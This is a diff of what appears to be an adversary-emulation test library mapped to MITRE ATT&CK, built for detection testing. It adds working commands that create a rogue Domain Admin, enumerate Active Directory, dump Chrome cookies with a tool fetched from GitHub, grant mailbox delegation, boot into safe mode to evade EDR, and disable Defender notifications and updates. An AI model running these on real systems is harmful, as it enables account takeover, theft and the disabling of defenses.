+        domain_controller:
+          description: Name of the domain_controller machine, defined in etc/hosts
+          type: string
+          default: adVM
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Packages sssd-ad sssd-tools realmd adcli installed and realm
+          available
+
+          '
+        prereq_command: 'which ldapadd && which ldapmodify
+
+          '
+        get_prereq_command: 'echo ldapadd or ldapmodify not found; exit 1
+
+          '
+      executor:
+        elevation_required: false
+        command: |
+          echo "dn: CN=Admin User,CN=Users,DC=#{domain},DC=#{top_level_domain}\nchangetype: add\nobjectClass: top\nobjectClass: person\nobjectClass: organizationalPerson\nobjectClass: user\ncn: Admin User\nsn: User\ngivenName: Atomic User\nuserPrincipalName: adminuser@#{domain}.#{top_level_domain}\nsAMAccountName: adminuser\nuserAccountControl: 512\nuserPassword: {CLEARTEXT}s3CureP4ssword123!\nmemberOf: CN=Domain Admins,CN=Users,DC=#{domain},DC=#{top_level_domain}" > tempadmin.ldif
+          echo ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
+          ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
+        cleanup_command: |
+          echo removing Atomic User (temporary user)
+          echo "dn: cn=Atomic User,cn=Users,dc=scwxscratch,dc=dev\nchangetype: delete" > deleteuser.ldif
+          ldapmodify -H ldap://#{domain_controller}:389 -x -D #{admin_user} -w #{admin_password} -f deleteuser.ldif
+          rm deleteuser.ldif
+          rm tempadmin.ldif
+        name: sh
+    - name: Active Directory Create User Account (Non-elevated)
+      auto_generated_guid: 8c992cb3-a46e-4fd5-b005-b1bab185af31
+      description: 'Use Admin Credentials to Create A Normal Account (as means of
+        entry)
+
+        '
+      supported_platforms:
+      - linux
+      input_arguments:
+        domain:
+          description: The domain to be tested
+          type: string
+          default: example
+        top_level_domain:
+          description: The top level domain (.com, .test, .remote, etc... following
+            domain, minus the .)
+          type: string
+          default: test
+        admin_user:
+          description: username@domain of a user with admin privileges
+          type: string
+          default: user@example.test
+        admin_password:
+          description: password of the user
+          type: string
+          default: s3CurePssw0rD!
+        domain_controller:
+          description: Name of the domain_controller machine, defined in etc/hosts
+          type: string
+          default: adVM
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Packages sssd-ad sssd-tools realmd adcli installed and realm
+          available, ldapadd, ldapmodify
+
+          '
+        prereq_command: |
+          which ldapadd
+          which ldapmodify
+        get_prereq_command: 'echo ldapadd or ldapmodify not found; exit 1
+
+          '
+      executor:
+        elevation_required: false
+        command: |
+          echo "dn: cn=Atomic User, cn=Users,dc=#{domain},dc=#{top_level_domain}\nobjectClass: person\ncn: Atomic User\nsn: User" > tempadmin.ldif
+          echo ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
+          ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
+        cleanup_command: |
+          echo removing Atomic User (temporary user)
+          echo "dn: cn=Atomic User,cn=Users,dc=scwxscratch,dc=dev\nchangetype: delete" > deleteuser.ldif
+          ldapmodify -H ldap://#{domain_controller}:389 -x -D #{admin_user} -w #{admin_password} -f deleteuser.ldif
+          rm deleteuser.ldif
+          rm tempadmin.ldif
+        name: sh
  T1542.002:
    technique:
      x_mitre_platforms:
@@ -47071,7 +47186,7 @@ persistence:
        D. - Defending O365 - 2019)"
      modified: '2022-04-19T14:55:26.110Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Additional Email Delegate Permissions
+      name: 'Account Manipulation: Additional Email Delegate Permissions'
      x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
        permissions changes that may indicate excessively broad permissions being
        granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -47092,6 +47207,7 @@ persistence:
      - 'Application Log: Application Log Content'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1098.002
    atomic_tests: []
  T1084:
    technique:
@@ -55890,6 +56006,7 @@ lateral-movement:
      - 'File: File Creation'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1570
    atomic_tests: []
  T1184:
    technique:
@@ -59151,6 +59268,7 @@ credential-access:
      supported_platforms:
      - linux
      - macos
+      - iaas:aws
      input_arguments:
        stratus_path:
          description: Path of stratus binary
@@ -63862,7 +63980,53 @@ discovery:
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      identifier: T1087.002
-    atomic_tests: []
+    atomic_tests:
+    - name: Active Directory Domain Search
+      auto_generated_guid: '096b6d2a-b63f-4100-8fa0-525da4cd25ca'
+      description: 'Output information from LDAPSearch. LDAP Password is the admin-user
+        password on Active Directory
+
+        '
+      supported_platforms:
+      - linux
+      input_arguments:
+        domain:
+          description: The domain to be tested
+          type: string
+          default: example
+        top_level_domain:
+          description: The top level domain (.com, .test, .remote, etc... following
+            domain, minus the .)
+          type: string
+          default: test
+        user:
+          description: username@domain of a user within the ad database
+          type: string
+          default: user@example.test
+        password:
+          description: password of the user with admin privileges referenced in admin_user
+          type: string
+          default: s3CurePssw0rD!
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Packages sssd-ad sssd-tools realmd adcli installed and realm
+          available, ldapsearch
+
+          '
+        prereq_command: 'which ldapsearch
+
+          '
+        get_prereq_command: 'echo ldapsearch not found
+
+          '
+      executor:
+        elevation_required: false
+        command: 'ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user}
+          -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub
+          -a always -z 1000 dn
+
+          '
+        name: sh
  T1063:
    technique:
      x_mitre_platforms:
@@ -64244,7 +64408,51 @@ discovery:
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      identifier: T1069.002
-    atomic_tests: []
+    atomic_tests:
+    - name: Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS
+      auto_generated_guid: d58d749c-4450-4975-a9e9-8b1d562755c2
+      description: 'Output information from LDAPSearch. LDAP Password is the admin-user
+        password on Active Directory
+
+        '
+      supported_platforms:
+      - linux
+      input_arguments:
+        domain:
+          description: The domain to be tested
+          type: string
+          default: example
+        top_level_domain:
+          description: The top level domain (.com, .test, .remote, etc... following
+            domain, minus the .)
+          type: string
+          default: com
+        user:
+          description: username@domain of a user
+          type: string
+          default: user@example.com
+        password:
+          description: password of the user referenced inside user
+          type: string
+          default: s3CurePssw0rD!
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Packages sssd-ad sssd-tools realmd adcli installed and realm
+          available, ldapsearch
+
+          '
+        prereq_command: 'which ldapsearch
+
+          '
+        get_prereq_command: 'echo missing ldapsearch command; exit 1
+
+          '
+      executor:
+        elevation_required: false
+        command: "ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user}
+          -w #{password} -b \"CN=Users,DC=#{domain},DC=#{top_level_domain}\" \"(objectClass=group)\"
+          -s sub -a always -z 1000 dn \n"
+        name: sh
  T1007:
    technique:
      modified: '2023-04-03T18:55:18.326Z'
@@ -65190,6 +65398,7 @@ discovery:
      supported_platforms:
      - linux
      - macos
+      - iaas:aws
      input_arguments:
        stratus_path:
          description: Path of stratus binary
@@ -2782,7 +2782,7 @@ defense-evasion:
        description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
          30, 2021.
      modified: '2021-08-31T14:51:47.352Z'
-      name: Safe Mode Boot
+      name: 'Impair Defenses: Safe Boot Mode'
      description: |-
        Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)

@@ -2809,6 +2809,7 @@ defense-evasion:
      - Anti-virus
      x_mitre_permissions_required:
      - Administrator
+      identifier: T1562.009
    atomic_tests: []
  T1542.005:
    technique:
@@ -14425,6 +14426,7 @@ defense-evasion:
      supported_platforms:
      - linux
      - macos
+      - iaas:aws
      input_arguments:
        stratus_path:
          description: Path of stratus binary
@@ -14551,6 +14553,7 @@ defense-evasion:
      supported_platforms:
      - linux
      - macos
+      - iaas:aws
      input_arguments:
        stratus_path:
          description: Path of stratus binary
@@ -20534,7 +20537,7 @@ privilege-escalation:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -20574,6 +20577,7 @@ privilege-escalation:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
+      identifier: T1547.012
    atomic_tests: []
  T1574.001:
    technique:
@@ -35591,7 +35595,7 @@ persistence:
  T1098.003:
    technique:
      modified: '2023-04-14T22:48:50.142Z'
-      name: Additional Cloud Roles
+      name: 'Account Manipulation: Additional Cloud Roles'
      description: "An adversary may add additional roles or permissions to an adversary-controlled
        cloud account to maintain persistent access to a tenant. For example, adversaries
        may update IAM policies in cloud-based environments or add a new global administrator
@@ -35694,6 +35698,7 @@ persistence:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1098.003
    atomic_tests: []
  T1547.012:
    technique:
@@ -35722,7 +35727,7 @@ persistence:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -35762,6 +35767,7 @@ persistence:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
+      identifier: T1547.012
    atomic_tests: []
  T1574.001:
    technique:
@@ -45324,7 +45330,7 @@ persistence:
        D. - Defending O365 - 2019)"
      modified: '2022-04-19T14:55:26.110Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Additional Email Delegate Permissions
+      name: 'Account Manipulation: Additional Email Delegate Permissions'
      x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
        permissions changes that may indicate excessively broad permissions being
        granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -45345,6 +45351,7 @@ persistence:
      - 'Application Log: Application Log Content'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1098.002
    atomic_tests: []
  T1084:
    technique:
@@ -53830,6 +53837,7 @@ lateral-movement:
      - 'File: File Creation'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1570
    atomic_tests: []
  T1184:
    technique:
@@ -55143,7 +55151,42 @@ credential-access:
      - User
      x_mitre_is_subtechnique: false
      identifier: T1539
-    atomic_tests: []
+    atomic_tests:
+    - name: Steal Chrome Cookies via Remote Debugging (Mac)
+      auto_generated_guid: e43cfdaf-3fb8-4a45-8de0-7eee8741d072
+      description: |-
+        The remote debugging functionality in Chrome can be used by malware for post-exploitation activities to obtain cookies without requiring keychain access. By initiating Chrome with a remote debug port, an attacker can sidestep encryption and employ Chrome's own mechanisms to access cookies.
+
+        If successful, this test will output a list of cookies.
+
+        Note: Chrome processes will be killed during this test.
+
+        See https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e
+      supported_platforms:
+      - macos
+      dependency_executor_name: bash
+      dependencies:
+      - description: Install Go
+        prereq_command: go version
+        get_prereq_command: brew install go
+      - description: Download and compile WhiteChocolateMacademiaNut
+        prereq_command: "/tmp/WhiteChocolateMacademiaNut/chocolate -h"
+        get_prereq_command: |-
+          git clone https://github.com/slyd0g/WhiteChocolateMacademiaNut.git /tmp/WhiteChocolateMacademiaNut
+          cd /tmp/WhiteChocolateMacademiaNut
+          go mod init chocolate
+          go mod tidy
+          go build
+      executor:
+        command: |-
+          killall 'Google Chrome'
+          sleep 1
+          open -a "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --args --remote-debugging-port=1337 --remote-allow-origins=http://localhost/
+          sleep 1
+          /tmp/WhiteChocolateMacademiaNut/chocolate -d cookies -p 1337
+        cleanup_command: rm -rf /tmp/WhiteChocolateMacademiaNut
+        name: bash
+        elevation_required: false
  T1003.002:
    technique:
      x_mitre_platforms:
@@ -56567,6 +56610,7 @@ credential-access:
      supported_platforms:
      - linux
      - macos
+      - iaas:aws
      input_arguments:
        stratus_path:
          description: Path of stratus binary
@@ -62308,6 +62352,7 @@ discovery:
      supported_platforms:
      - linux
      - macos
+      - iaas:aws
      input_arguments:
        stratus_path:
          description: Path of stratus binary
@@ -2441,7 +2441,7 @@ defense-evasion:
        description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
          30, 2021.
      modified: '2021-08-31T14:51:47.352Z'
-      name: Safe Mode Boot
+      name: 'Impair Defenses: Safe Boot Mode'
      description: |-
        Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)

@@ -2468,6 +2468,7 @@ defense-evasion:
      - Anti-virus
      x_mitre_permissions_required:
      - Administrator
+      identifier: T1562.009
    atomic_tests: []
  T1542.005:
    technique:
@@ -18377,7 +18378,7 @@ privilege-escalation:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -18417,6 +18418,7 @@ privilege-escalation:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
+      identifier: T1547.012
    atomic_tests: []
  T1574.001:
    technique:
@@ -32607,7 +32609,7 @@ persistence:
  T1098.003:
    technique:
      modified: '2023-04-14T22:48:50.142Z'
-      name: Additional Cloud Roles
+      name: 'Account Manipulation: Additional Cloud Roles'
      description: "An adversary may add additional roles or permissions to an adversary-controlled
        cloud account to maintain persistent access to a tenant. For example, adversaries
        may update IAM policies in cloud-based environments or add a new global administrator
@@ -32710,6 +32712,7 @@ persistence:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1098.003
    atomic_tests: []
  T1547.012:
    technique:
@@ -32738,7 +32741,7 @@ persistence:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -32778,6 +32781,7 @@ persistence:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
+      identifier: T1547.012
    atomic_tests: []
  T1574.001:
    technique:
@@ -41729,7 +41733,7 @@ persistence:
        D. - Defending O365 - 2019)"
      modified: '2022-04-19T14:55:26.110Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Additional Email Delegate Permissions
+      name: 'Account Manipulation: Additional Email Delegate Permissions'
      x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
        permissions changes that may indicate excessively broad permissions being
        granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -41750,7 +41754,59 @@ persistence:
      - 'Application Log: Application Log Content'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1098.002
+    atomic_tests:
+    - name: EXO - Full access mailbox permission granted to a user
+      auto_generated_guid: 17d046be-fdd0-4cbb-b5c7-55c85d9d0714
+      description: |
+        Give a nominated user, full mailbox delegation access of another user.
+        This can be used by an adversary to maintain persistent access to a target's mailbox in M365.
+      supported_platforms:
+      - office-365
+      input_arguments:
+        username:
+          description: office-365 username
+          type: string
+          default: o365_user_test@contoso.com
+        password:
+          description: office-365 password
+          type: string
+          default: o365_password_test
+        delegate_target:
+          description: office-365 target_email
+          type: string
+          default: delegate@contoso.com
+        operator_mailbox:
+          description: office-365 target_email
+          type: string
+          default: operator@contoso.com
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'ExchangeOnlineManagement PowerShell module must be installed
+
+          '
+        prereq_command: |
+          $RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+          if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
+        get_prereq_command: "Install-Module -Name ExchangeOnlineManagement         \n"
+      executor:
+        command: |
+          Import-Module ExchangeOnlineManagement
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-ExchangeOnline -Credential $creds
+          Add-MailboxPermission -Identity "#{delegate_target}" -User "#{operator_mailbox}" -AccessRights FullAccess -InheritanceType All
+          Disconnect-ExchangeOnline -Confirm:$false
+        cleanup_command: |
+          Import-Module ExchangeOnlineManagement
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-ExchangeOnline -Credential $creds
+          Remove-MailboxPermission -Identity "#{delegate_target}" -User "#{operator_mailbox}" -AccessRights FullAccess -InheritanceType All -Confirm:$false
+          Disconnect-ExchangeOnline -Confirm:$false
+        name: powershell
+        elevation_required: false
  T1084:
    technique:
      x_mitre_platforms:
@@ -49501,6 +49557,7 @@ lateral-movement:
      - 'File: File Creation'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1570
    atomic_tests: []
  T1184:
    technique:
@@ -2441,7 +2441,7 @@ defense-evasion:
        description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
          30, 2021.
      modified: '2021-08-31T14:51:47.352Z'
-      name: Safe Mode Boot
+      name: 'Impair Defenses: Safe Boot Mode'
      description: |-
        Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)

@@ -2468,6 +2468,7 @@ defense-evasion:
      - Anti-virus
      x_mitre_permissions_required:
      - Administrator
+      identifier: T1562.009
    atomic_tests: []
  T1542.005:
    technique:
@@ -18247,7 +18248,7 @@ privilege-escalation:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -18287,6 +18288,7 @@ privilege-escalation:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
+      identifier: T1547.012
    atomic_tests: []
  T1574.001:
    technique:
@@ -32477,7 +32479,7 @@ persistence:
  T1098.003:
    technique:
      modified: '2023-04-14T22:48:50.142Z'
-      name: Additional Cloud Roles
+      name: 'Account Manipulation: Additional Cloud Roles'
      description: "An adversary may add additional roles or permissions to an adversary-controlled
        cloud account to maintain persistent access to a tenant. For example, adversaries
        may update IAM policies in cloud-based environments or add a new global administrator
@@ -32580,6 +32582,7 @@ persistence:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1098.003
    atomic_tests: []
  T1547.012:
    technique:
@@ -32608,7 +32611,7 @@ persistence:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -32648,6 +32651,7 @@ persistence:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
+      identifier: T1547.012
    atomic_tests: []
  T1574.001:
    technique:
@@ -41599,7 +41603,7 @@ persistence:
        D. - Defending O365 - 2019)"
      modified: '2022-04-19T14:55:26.110Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Additional Email Delegate Permissions
+      name: 'Account Manipulation: Additional Email Delegate Permissions'
      x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
        permissions changes that may indicate excessively broad permissions being
        granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -41620,6 +41624,7 @@ persistence:
      - 'Application Log: Application Log Content'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1098.002
    atomic_tests: []
  T1084:
    technique:
@@ -49323,6 +49328,7 @@ lateral-movement:
      - 'File: File Creation'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1570
    atomic_tests: []
  T1184:
    technique:
@@ -2663,7 +2663,7 @@ defense-evasion:
      auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a
      description: |
        Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg.
-        reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe"
+        reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "C:\temp\AtomicRedteam.exe"
      supported_platforms:
      - windows
      input_arguments:
@@ -3367,6 +3367,49 @@ defense-evasion:
          sc.exe delete #{service_name}
        name: command_prompt
        elevation_required: true
+    - name: Command Execution with NirCmd
+      auto_generated_guid: 2748ab4a-1e0b-4cf2-a2b0-8ef765bec7be
+      description: |
+        NirCmd is used by threat actors to execute commands, which can include recon and privilege escalation via running commands via the SYSTEM account
+        See https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis
+      supported_platforms:
+      - windows
+      input_arguments:
+        nircmd_location:
+          description: Location of nircmd executable
+          type: Path
+          default: PathToAtomicsFolder\..\ExternalPayloads\nircmd.exe
+        command_to_execute:
+          description: Command for nircmd to execute
+          type: Path
+          default: win child class "Shell_TrayWnd" hide class "TrayClockWClass"
+        cleanup_command_to_execute:
+          description: Cleanup command to undo the arbitrary command ran by nircmd
+          type: Path
+          default: win child class "Shell_TrayWnd" show class "TrayClockWClass"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The Nircmd executable must exist at (#{nircmd_location})
+
+          '
+        prereq_command: 'if (Test-Path #{nircmd_location}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
+          -ErrorAction Ignore -Force | Out-Null\ninvoke-webrequest \"https://www.nirsoft.net/utils/nircmd-x64.zip\"
+          -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\nircmd.zip\" \nexpand-archive
+          -path \"PathToAtomicsFolder\\..\\ExternalPayloads\\nircmd.zip\" -destinationpath
+          PathToAtomicsFolder\\..\\ExternalPayloads\\\n"
+      executor:
+        command: 'cmd /c #{nircmd_location} #{command_to_execute}
+
+          '
+        cleanup_command: 'cmd /c #{nircmd_location} #{cleanup_command_to_execute}
+          -erroraction silentlycontinue | out-null
+
+          '
+        name: powershell
+        elevation_required: false
  T1484.002:
    technique:
      modified: '2022-10-21T16:09:14.555Z'
@@ -3572,7 +3615,7 @@ defense-evasion:
        description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
          30, 2021.
      modified: '2021-08-31T14:51:47.352Z'
-      name: Safe Mode Boot
+      name: 'Impair Defenses: Safe Boot Mode'
      description: |-
        Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)

@@ -3599,7 +3642,19 @@ defense-evasion:
      - Anti-virus
      x_mitre_permissions_required:
      - Administrator
-    atomic_tests: []
+      identifier: T1562.009
+    atomic_tests:
+    - name: Safe Mode Boot
+      auto_generated_guid: 2a78362e-b79a-4482-8e24-be397bce4d85
+      description: Allows adversaries to abuse safe mode to disable endpoint defenses
+        that may not start with limited boot
+      supported_platforms:
+      - windows
+      executor:
+        command: bcdedit /set safeboot network
+        cleanup_command: bcdedit /deletevalue {current} safeboot
+        name: command_prompt
+        elevation_required: true
  T1542.005:
    technique:
      x_mitre_platforms:
@@ -7304,6 +7359,35 @@ defense-evasion:
          del %TEMP%\ie4uinit.exe >nul 2>&1
          del %TEMP%\ieuinit.inf >nul 2>&1
        name: command_prompt
+    - name: LOLBAS CustomShellHost to Spawn Process
+      auto_generated_guid: b1eeb683-90bb-4365-bbc2-2689015782fe
+      description: |
+        This test simulates an adversary copying `customshellhost.exe` and `calc.exe` from `C:\windows\system32\` to `C:\temp\`, renaming `calc.exe` to `explorer.exe`.
+        Upon execution, customshellhost.exe will spawn calc.exe.
+        Note this will only work on Windows 10 or 11.
+        [LOLBAS](https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/)
+        [BishopFox](https://bishopfox.com/blog/edr-bypass-with-lolbins)
+      supported_platforms:
+      - windows
+      input_arguments:
+        dest_path:
+          description: Directory to copy files into
+          type: path
+          default: C:\test
+      executor:
+        command: |
+          if (-not (Test-Path #{dest_path})) {
+          New-Item -Path #{dest_path} -ItemType Directory
+          } else {
+          Write-Host "Directory #{dest_path} already exists." }
+          Copy-Item -Path "C:\windows\system32\customshellhost.exe" -Destination "#{dest_path}\customshellhost.exe" -Force
+          Copy-Item -Path "C:\windows\system32\calc.exe" -Destination "#{dest_path}\explorer.exe" -Force
+          #{dest_path}\customshellhost.exe
+        cleanup_command: 'Remove-Item -Path #{dest_path} -Recurse -Force
+
+          '
+        name: powershell
+        elevation_required: true
  T1038:
    technique:
      x_mitre_platforms:
@@ -9989,8 +10073,10 @@ defense-evasion:
      supported_platforms:
      - windows
      executor:
-        command: "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\"
-          /v NoPropertiesMyDocuments /t REG_DWORD /d 1 \n"
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoPropertiesMyDocuments /t REG_DWORD /d 1 /f
+
+          '
        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
          /v NoPropertiesMyDocuments /f >nul 2>&1

@@ -10462,12 +10548,12 @@ defense-evasion:
      - windows
      executor:
        command: 'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security
-          Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d 1
+          Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d 1 /f

          '
        cleanup_command: 'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender
          Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d
-          0
+          0 /f

          '
        name: command_prompt
@@ -10482,11 +10568,11 @@ defense-evasion:
      - windows
      executor:
        command: 'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU"
-          /v "NoAutoUpdate" /t REG_DWORD /d 1
+          /v "NoAutoUpdate" /t REG_DWORD /d 1 /f

          '
        cleanup_command: 'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU"
